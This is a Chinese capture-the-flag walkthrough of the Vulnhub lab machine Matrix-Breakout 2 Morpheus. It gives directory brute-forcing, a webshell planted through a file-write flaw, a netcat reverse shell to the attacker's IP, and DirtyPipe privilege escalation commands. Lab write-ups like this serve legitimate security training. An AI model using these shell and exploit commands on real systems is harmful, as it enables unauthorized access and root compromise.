Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS

攻击机192.168.223.128
目标机192.168.223.140
主机发现nmap -sP 192.168.223.0/24
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第1张图片

端口扫描nmap -p- 192.168.223.140
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第2张图片

开启了 22,80,81三个端口

看一下web界面
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第3张图片

是inguardians 写给jaybeale的信,说计算机被密码锁住了,至少ssh是的
没什么有用的信息,扫一下目录看看
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第4张图片

捏马 dirsearch什么信息都没有,思路卡住了,看看别人的wp,用/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt这个字典可以爆出来,试试
dirsearch -u 192.168.223.140 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
爆半天,爆出来graffiti.txt robots.txt graffiti.php
看了发现graffiti.txt 是graffiti.php的文字
看一下php文件
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第5张图片

测试,发现post的内容会被写入到graffiti.txt里面
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第6张图片

看看能不能将shell写入的随便一个文件
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第7张图片Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第8张图片

写入成功,那么就可以写入一句话了

filename=getshell.php

Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第9张图片

能进去说明创建好了,反弹shell试试
攻击机nc -lvnp 4567
靶机nc -e /bin/bash 192.168.223.128 4567
md连不上去,可能nc 的参数又坏了
用一个在线生成shell 的网站
www.revshells.com
生产php反弹shell
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第10张图片Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第11张图片
成功弹回shell
切换到交互shell
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第12张图片

Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第13张图片

拿到flag1

让我去看这个图片
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第14张图片

不会是隐写吧
算了,不那这个flag了,直接提权 吧。
看一下可不可以suid提权

find / -perm 4000 2>/dev/null

啥也找不到
没思路,面向wp吧
看别人是用一款漏扫工具
LinPEAS
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第15张图片

面向wp,他们都用这个cve,那我也用吧

[+] [CVE-2022-0847] DirtyPipe

Details: https://dirtypipe.cm4all.com/
Exposure: probable
Tags: ubuntu=(20.04|21.04),[ debian=11 ]
Download URL: https://haxx.in/files/dirtypipez.c

searchsploit dirtypipe
searchsploit -m 50808.c
python -m http.server 6677
wget http://192.168.223.128:6677/50808.c
gcc 50808.c -o 50808
./50808 /bin/su

Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS_第16张图片

拿到flag
总结1.目录爆破2.任意文件写入3.rce4.反弹shell5.linpeas漏扫6.脏管提权

你可能感兴趣的:(vulnhub靶场,渗透测试,vulnhub靶场,网络安全,靶场,安全)